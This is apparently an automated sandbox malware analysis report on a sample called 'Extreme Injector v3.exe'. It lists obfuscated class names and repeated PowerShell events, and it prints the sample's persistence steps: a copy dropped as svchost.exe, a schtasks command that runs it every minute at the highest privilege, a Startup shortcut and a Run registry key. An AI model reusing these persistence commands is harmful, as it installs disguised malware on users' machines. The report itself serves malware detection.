                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77E770 push ebp; iretd 11_2_00007FFD9B77E771
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77EC00 push ebp; iretd 11_2_00007FFD9B77EC01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77F080 push ebp; iretd 11_2_00007FFD9B77F081
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77F400 push ebp; iretd 11_2_00007FFD9B77F401
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77F700 push ebp; iretd 11_2_00007FFD9B77F701
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77FD00 push ebp; iretd 11_2_00007FFD9B77FD01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D410 push ebp; iretd 11_2_00007FFD9B77D411
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D090 push ebp; iretd 11_2_00007FFD9B77D091
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77D790 push ebp; iretd 11_2_00007FFD9B77D791
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_00007FFD9B77DB10 push ebp; iretd 11_2_00007FFD9B77DB11
                      Source: Extreme Injector v3.exe, 2tvp9ITKtQDpTk.cs High entropy of concatenated method names: 'pWljicVxbCThX4', 'bkbFaJoVH24uos', 'NfkC7hH3hKFQkZ', 'ycIUWuM2oLhCOzbad35ssBMPRvE5ylVqya6IzXKvFnJtCey', 'l1h8cfwZxgIa9G17TQgMQBMCUKc5RUewIDzBWrejeRMIrDP', 'ymYrB86QkROIpuU9gJ8BfU0LpFzwtJEstDQ9MpFLwJRuXLK', 'uCX4LHDOfMz61tWV5Zu3gpJz4m4dflA4kqEN0PvJLqkDO1S', 'SA3OEhUXH7nclp9mwJeGaV7Leims5WdmszoMytoQTV5nz1E', 'pT1qG71qU6WvodMfusR5NSuLyw8owlSlPvEy5BGSr3KEJjq', 'URgIIvIa643U7kFk4kPGA3CDmiMKCzF53Bm3zcqdOtEOeXg'
                      Source: Extreme Injector v3.exe, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs High entropy of concatenated method names: 'Pv0Uv7ZYBNwgbDdFPqq8v1ta8olYY', 'CZ04ba3T3IYK0M1Pcv4AazfVN8B2g', 'FFGhyij4eCf1IKOEAKu446qWLkdEb', 'B90L9ijhGAEXdV3XHv3cgGCAVyuTA', 'AJb40AsHeiB6YvewWBDBbeFQtqFHd', 'sRYLJGOHessVxux9icpXamZoWzCcY', 'V3YmDYzvIvseYcKZItuzRiThpmo9K', 'gO6MtryZPWkEAnEkDsi01Fyb0s81J', 'dZlR9pT68b67piHgU0rDTPsNlrwbZ', 'OWHQjSBYR36RB99i3dlEfdgw8Peni'
                      Source: Extreme Injector v3.exe, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs High entropy of concatenated method names: 'XqPvliaaW4ZuWbaKXpWRwzRCdEKmF', 'M33X6VISXUkeDPSGqsDK1LxRRzTq3', 'apWfloInmyMykiVHs0B2ZIk6DIKgg', 'zaDvWFzsQvLPmJH1DusWI6iZZca1N', 'J2pDkTvuKJPALMCjFjIFMYdZg7vKp', 'vJsbAh6jqDXXtQQI875zuhIwPVHBj', 'rsjjZ00AvYTuUUtq3m7kIPbH4hLh9', 'ypfpx3KRYSjwBXKmfLd6vWOyuxWhJ', '_7oFybmPqVjyL6l5IdZYOSEgKlyQZD', 'EvrMC2Ci4BHuOoSv1BvgqAx3g67os'
                      Source: Extreme Injector v3.exe, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs High entropy of concatenated method names: 'CBdo8AiypmQ5KYQPUyaxTIKiqGNkU', 'YKr7sAb5eXUVfwdayb5ZS79THz5BA', 'JYhsGeGrDsnKMfZLXR04xlaaSyhEw', 'cP3KbRtvcCaZiwvPkPwXm2ytO3P5E', '_1bjTzfqpC4EZStLrLxfumi0MywDQO', 'rG8MeE2zsg0eqOz5T4T7oMaItx5X2', 'bzcBAIkbT7YOQP0AxRYMPcMOMJguN', 'AHGNqg8NmW3mxAtaU3UikiaiyrCRK', 'zZqgjl5L0COZ5DkAvLWfzIygibxdU', 'nSoW0XY7ec6C2KaCpXE02bLHgpy2B'
                      Source: Extreme Injector v3.exe, oN8SqtbHGq18HI8XT15gdwPNldMUG.cs High entropy of concatenated method names: 'A573LW1MK3L0EdHEnXVDwMEmSK6Yv', '_1gFPUUV95a9xMqH1ikYx4AbtE551K', 'd9B3OlPKQWnMR9m9dq0LPB9V9pHmj', 'Id9P7SABv2Vj6ICf2GEU23IHQjBqk', '_6PaQgAwfqJxTHy', 'rk7KR8S54c16Pf', '_627eHcWKJzD15z', 'XBFht0NEeEAfrm', 'YZie9MJEJLqxVh', 'NBFnHwN38Z3wns'
                      Source: Extreme Injector v3.exe, 5z67b4zUwaB1KqacPX9PFQGvID3lxPJfRYFRe69g4yqaWO5Fh8iFVI1Wh6N7MkBxSxPCEaWNUjtkxVzNZB1M6Rp.cs High entropy of concatenated method names: 'Jwkvtg1FzMHLNNhREqtwI8Zn0Q7YYy6ayDvt4hPq7y2hZhTofB9HkAvbuBQE5zCDBVpoBDedP1TV3WeeP5rYTCZ', 'm1Yxfgo5KZ9q1u63dPbuEwLgpm7ERW6yXnj7Jh5jEzUwIwnukrwlt6Cbi1Z0mFkw3boyM3J51HPBJhuI05QHt1O', 'A9X93YsvhnonzVmmRtUDMzeI1nLJjWUQQmoSLfvIVYhLvAWq2XkagFyTYX9rHmvFXZh6VUpMI6hivM4KklU3Chj', 'LBRDXBExcyanjdKDBJJVQQpuJL2pMk6P0vEHjy575rKjbW1kL4qiVYmWVqBNzLVFDweqvGT7UMapmIELN6PtPBc', 'nDRslV1RaJxmLkLFn34RNT9g4cXFXn61JeF5YsxtkriDSlBzdP7gQsPxpJl4lGDdiMxn1o4LLfynMOpN4yWZ6Y1', 'bStkonBexKpUKlE451DsCYdHDnheMiLkK4fq9sU64zq4s5jCRAtZQLOl27lgfgzzBnHERcdGMHFiAVpCB4SCVju', 'Ale9L2Z1X61w7Br1bQBbNtQbkWlSVjEif0ZIx00f3RHz1rIgLhOQKFWM3gKinq6DPhRPPPrrvj2PqjMKN1CFsT8', 'qErANfptKdUlX7ATylDkSKyENpAClEjim4sxaYKZnYbdcS6Kx2Z9OpR2G2erPihJrNnvtMsgVhZAYGRLVI8hY0T', 'xvE27X9IklOJ0W6ZpXGd0blvS8WGnhoa7vt6CdCtqSHsNehIjsvcTs6lkGsvec5KZ163luWKFwyq0faq27aZhhv', 'qMJPBRzcXQi2QR6WiYkX3jnOtQGP2iAEuTsQBagVKs98L2O21S9RWQPeW9jfbqB5yMGRdwGx077cO4rQ6AmSq4p'
                      Source: svchost.exe.0.dr, 2tvp9ITKtQDpTk.cs High entropy of concatenated method names: 'pWljicVxbCThX4', 'bkbFaJoVH24uos', 'NfkC7hH3hKFQkZ', 'ycIUWuM2oLhCOzbad35ssBMPRvE5ylVqya6IzXKvFnJtCey', 'l1h8cfwZxgIa9G17TQgMQBMCUKc5RUewIDzBWrejeRMIrDP', 'ymYrB86QkROIpuU9gJ8BfU0LpFzwtJEstDQ9MpFLwJRuXLK', 'uCX4LHDOfMz61tWV5Zu3gpJz4m4dflA4kqEN0PvJLqkDO1S', 'SA3OEhUXH7nclp9mwJeGaV7Leims5WdmszoMytoQTV5nz1E', 'pT1qG71qU6WvodMfusR5NSuLyw8owlSlPvEy5BGSr3KEJjq', 'URgIIvIa643U7kFk4kPGA3CDmiMKCzF53Bm3zcqdOtEOeXg'
                      Source: svchost.exe.0.dr, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.cs High entropy of concatenated method names: 'Pv0Uv7ZYBNwgbDdFPqq8v1ta8olYY', 'CZ04ba3T3IYK0M1Pcv4AazfVN8B2g', 'FFGhyij4eCf1IKOEAKu446qWLkdEb', 'B90L9ijhGAEXdV3XHv3cgGCAVyuTA', 'AJb40AsHeiB6YvewWBDBbeFQtqFHd', 'sRYLJGOHessVxux9icpXamZoWzCcY', 'V3YmDYzvIvseYcKZItuzRiThpmo9K', 'gO6MtryZPWkEAnEkDsi01Fyb0s81J', 'dZlR9pT68b67piHgU0rDTPsNlrwbZ', 'OWHQjSBYR36RB99i3dlEfdgw8Peni'
                      Source: svchost.exe.0.dr, rSpjjO8oUvCMcKvoevjeljS9Yghyz.cs High entropy of concatenated method names: 'XqPvliaaW4ZuWbaKXpWRwzRCdEKmF', 'M33X6VISXUkeDPSGqsDK1LxRRzTq3', 'apWfloInmyMykiVHs0B2ZIk6DIKgg', 'zaDvWFzsQvLPmJH1DusWI6iZZca1N', 'J2pDkTvuKJPALMCjFjIFMYdZg7vKp', 'vJsbAh6jqDXXtQQI875zuhIwPVHBj', 'rsjjZ00AvYTuUUtq3m7kIPbH4hLh9', 'ypfpx3KRYSjwBXKmfLd6vWOyuxWhJ', '_7oFybmPqVjyL6l5IdZYOSEgKlyQZD', 'EvrMC2Ci4BHuOoSv1BvgqAx3g67os'
                      Source: svchost.exe.0.dr, 3PBEeO1MD7801VZTmLM4yToFRXenF.cs High entropy of concatenated method names: 'CBdo8AiypmQ5KYQPUyaxTIKiqGNkU', 'YKr7sAb5eXUVfwdayb5ZS79THz5BA', 'JYhsGeGrDsnKMfZLXR04xlaaSyhEw', 'cP3KbRtvcCaZiwvPkPwXm2ytO3P5E', '_1bjTzfqpC4EZStLrLxfumi0MywDQO', 'rG8MeE2zsg0eqOz5T4T7oMaItx5X2', 'bzcBAIkbT7YOQP0AxRYMPcMOMJguN', 'AHGNqg8NmW3mxAtaU3UikiaiyrCRK', 'zZqgjl5L0COZ5DkAvLWfzIygibxdU', 'nSoW0XY7ec6C2KaCpXE02bLHgpy2B'
                      Source: svchost.exe.0.dr, oN8SqtbHGq18HI8XT15gdwPNldMUG.cs High entropy of concatenated method names: 'A573LW1MK3L0EdHEnXVDwMEmSK6Yv', '_1gFPUUV95a9xMqH1ikYx4AbtE551K', 'd9B3OlPKQWnMR9m9dq0LPB9V9pHmj', 'Id9P7SABv2Vj6ICf2GEU23IHQjBqk', '_6PaQgAwfqJxTHy', 'rk7KR8S54c16Pf', '_627eHcWKJzD15z', 'XBFht0NEeEAfrm', 'YZie9MJEJLqxVh', 'NBFnHwN38Z3wns'
                      Source: svchost.exe.0.dr, 5z67b4zUwaB1KqacPX9PFQGvID3lxPJfRYFRe69g4yqaWO5Fh8iFVI1Wh6N7MkBxSxPCEaWNUjtkxVzNZB1M6Rp.cs High entropy of concatenated method names: 'Jwkvtg1FzMHLNNhREqtwI8Zn0Q7YYy6ayDvt4hPq7y2hZhTofB9HkAvbuBQE5zCDBVpoBDedP1TV3WeeP5rYTCZ', 'm1Yxfgo5KZ9q1u63dPbuEwLgpm7ERW6yXnj7Jh5jEzUwIwnukrwlt6Cbi1Z0mFkw3boyM3J51HPBJhuI05QHt1O', 'A9X93YsvhnonzVmmRtUDMzeI1nLJjWUQQmoSLfvIVYhLvAWq2XkagFyTYX9rHmvFXZh6VUpMI6hivM4KklU3Chj', 'LBRDXBExcyanjdKDBJJVQQpuJL2pMk6P0vEHjy575rKjbW1kL4qiVYmWVqBNzLVFDweqvGT7UMapmIELN6PtPBc', 'nDRslV1RaJxmLkLFn34RNT9g4cXFXn61JeF5YsxtkriDSlBzdP7gQsPxpJl4lGDdiMxn1o4LLfynMOpN4yWZ6Y1', 'bStkonBexKpUKlE451DsCYdHDnheMiLkK4fq9sU64zq4s5jCRAtZQLOl27lgfgzzBnHERcdGMHFiAVpCB4SCVju', 'Ale9L2Z1X61w7Br1bQBbNtQbkWlSVjEif0ZIx00f3RHz1rIgLhOQKFWM3gKinq6DPhRPPPrrvj2PqjMKN1CFsT8', 'qErANfptKdUlX7ATylDkSKyENpAClEjim4sxaYKZnYbdcS6Kx2Z9OpR2G2erPihJrNnvtMsgVhZAYGRLVI8hY0T', 'xvE27X9IklOJ0W6ZpXGd0blvS8WGnhoa7vt6CdCtqSHsNehIjsvcTs6lkGsvec5KZ163luWKFwyq0faq27aZhhv', 'qMJPBRzcXQi2QR6WiYkX3jnOtQGP2iAEuTsQBagVKs98L2O21S9RWQPeW9jfbqB5yMGRdwGx077cO4rQ6AmSq4p'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 2tvp9ITKtQDpTk.cs High entropy of concatenated method names: 'pWljicVxbCThX4', 'bkbFaJoVH24uos', 'NfkC7hH3hKFQkZ', 'ycIUWuM2oLhCOzbad35ssBMPRvE5ylVqya6IzXKvFnJtCey', 'l1h8cfwZxgIa9G17TQgMQBMCUKc5RUewIDzBWrejeRMIrDP', 'ymYrB86QkROIpuU9gJ8BfU0LpFzwtJEstDQ9MpFLwJRuXLK', 'uCX4LHDOfMz61tWV5Zu3gpJz4m4dflA4kqEN0PvJLqkDO1S', 'SA3OEhUXH7nclp9mwJeGaV7Leims5WdmszoMytoQTV5nz1E', 'pT1qG71qU6WvodMfusR5NSuLyw8owlSlPvEy5BGSr3KEJjq', 'URgIIvIa643U7kFk4kPGA3CDmiMKCzF53Bm3zcqdOtEOeXg'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5IcfDKxoD0ObcBTJs0Kr7rM0Ud9ZJ.csHigh entropy of concatenated method names: 'Pv0Uv7ZYBNwgbDdFPqq8v1ta8olYY', 'CZ04ba3T3IYK0M1Pcv4AazfVN8B2g', 'FFGhyij4eCf1IKOEAKu446qWLkdEb', 'B90L9ijhGAEXdV3XHv3cgGCAVyuTA', 'AJb40AsHeiB6YvewWBDBbeFQtqFHd', 'sRYLJGOHessVxux9icpXamZoWzCcY', 'V3YmDYzvIvseYcKZItuzRiThpmo9K', 'gO6MtryZPWkEAnEkDsi01Fyb0s81J', 'dZlR9pT68b67piHgU0rDTPsNlrwbZ', 'OWHQjSBYR36RB99i3dlEfdgw8Peni'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, rSpjjO8oUvCMcKvoevjeljS9Yghyz.csHigh entropy of concatenated method names: 'XqPvliaaW4ZuWbaKXpWRwzRCdEKmF', 'M33X6VISXUkeDPSGqsDK1LxRRzTq3', 'apWfloInmyMykiVHs0B2ZIk6DIKgg', 'zaDvWFzsQvLPmJH1DusWI6iZZca1N', 'J2pDkTvuKJPALMCjFjIFMYdZg7vKp', 'vJsbAh6jqDXXtQQI875zuhIwPVHBj', 'rsjjZ00AvYTuUUtq3m7kIPbH4hLh9', 'ypfpx3KRYSjwBXKmfLd6vWOyuxWhJ', '_7oFybmPqVjyL6l5IdZYOSEgKlyQZD', 'EvrMC2Ci4BHuOoSv1BvgqAx3g67os'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 3PBEeO1MD7801VZTmLM4yToFRXenF.csHigh entropy of concatenated method names: 'CBdo8AiypmQ5KYQPUyaxTIKiqGNkU', 'YKr7sAb5eXUVfwdayb5ZS79THz5BA', 'JYhsGeGrDsnKMfZLXR04xlaaSyhEw', 'cP3KbRtvcCaZiwvPkPwXm2ytO3P5E', '_1bjTzfqpC4EZStLrLxfumi0MywDQO', 'rG8MeE2zsg0eqOz5T4T7oMaItx5X2', 'bzcBAIkbT7YOQP0AxRYMPcMOMJguN', 'AHGNqg8NmW3mxAtaU3UikiaiyrCRK', 'zZqgjl5L0COZ5DkAvLWfzIygibxdU', 'nSoW0XY7ec6C2KaCpXE02bLHgpy2B'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, oN8SqtbHGq18HI8XT15gdwPNldMUG.csHigh entropy of concatenated method names: 'A573LW1MK3L0EdHEnXVDwMEmSK6Yv', '_1gFPUUV95a9xMqH1ikYx4AbtE551K', 'd9B3OlPKQWnMR9m9dq0LPB9V9pHmj', 'Id9P7SABv2Vj6ICf2GEU23IHQjBqk', '_6PaQgAwfqJxTHy', 'rk7KR8S54c16Pf', '_627eHcWKJzD15z', 'XBFht0NEeEAfrm', 'YZie9MJEJLqxVh', 'NBFnHwN38Z3wns'
                      Source: 0.2.Extreme Injector v3.exe.265f8b0.0.raw.unpack, 5z67b4zUwaB1KqacPX9PFQGvID3lxPJfRYFRe69g4yqaWO5Fh8iFVI1Wh6N7MkBxSxPCEaWNUjtkxVzNZB1M6Rp.csHigh entropy of concatenated method names: 'Jwkvtg1FzMHLNNhREqtwI8Zn0Q7YYy6ayDvt4hPq7y2hZhTofB9HkAvbuBQE5zCDBVpoBDedP1TV3WeeP5rYTCZ', 'm1Yxfgo5KZ9q1u63dPbuEwLgpm7ERW6yXnj7Jh5jEzUwIwnukrwlt6Cbi1Z0mFkw3boyM3J51HPBJhuI05QHt1O', 'A9X93YsvhnonzVmmRtUDMzeI1nLJjWUQQmoSLfvIVYhLvAWq2XkagFyTYX9rHmvFXZh6VUpMI6hivM4KklU3Chj', 'LBRDXBExcyanjdKDBJJVQQpuJL2pMk6P0vEHjy575rKjbW1kL4qiVYmWVqBNzLVFDweqvGT7UMapmIELN6PtPBc', 'nDRslV1RaJxmLkLFn34RNT9g4cXFXn61JeF5YsxtkriDSlBzdP7gQsPxpJl4lGDdiMxn1o4LLfynMOpN4yWZ6Y1', 'bStkonBexKpUKlE451DsCYdHDnheMiLkK4fq9sU64zq4s5jCRAtZQLOl27lgfgzzBnHERcdGMHFiAVpCB4SCVju', 'Ale9L2Z1X61w7Br1bQBbNtQbkWlSVjEif0ZIx00f3RHz1rIgLhOQKFWM3gKinq6DPhRPPPrrvj2PqjMKN1CFsT8', 'qErANfptKdUlX7ATylDkSKyENpAClEjim4sxaYKZnYbdcS6Kx2Z9OpR2G2erPihJrNnvtMsgVhZAYGRLVI8hY0T', 'xvE27X9IklOJ0W6ZpXGd0blvS8WGnhoa7vt6CdCtqSHsNehIjsvcTs6lkGsvec5KZ163luWKFwyq0faq27aZhhv', 'qMJPBRzcXQi2QR6WiYkX3jnOtQGP2iAEuTsQBagVKs98L2O21S9RWQPeW9jfbqB5yMGRdwGx077cO4rQ6AmSq4p'

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | File created: C:\Users\user\AppData\Roaming\svchost.exe

                      Boot Survival

                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\Desktop\Extreme Injector v3.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
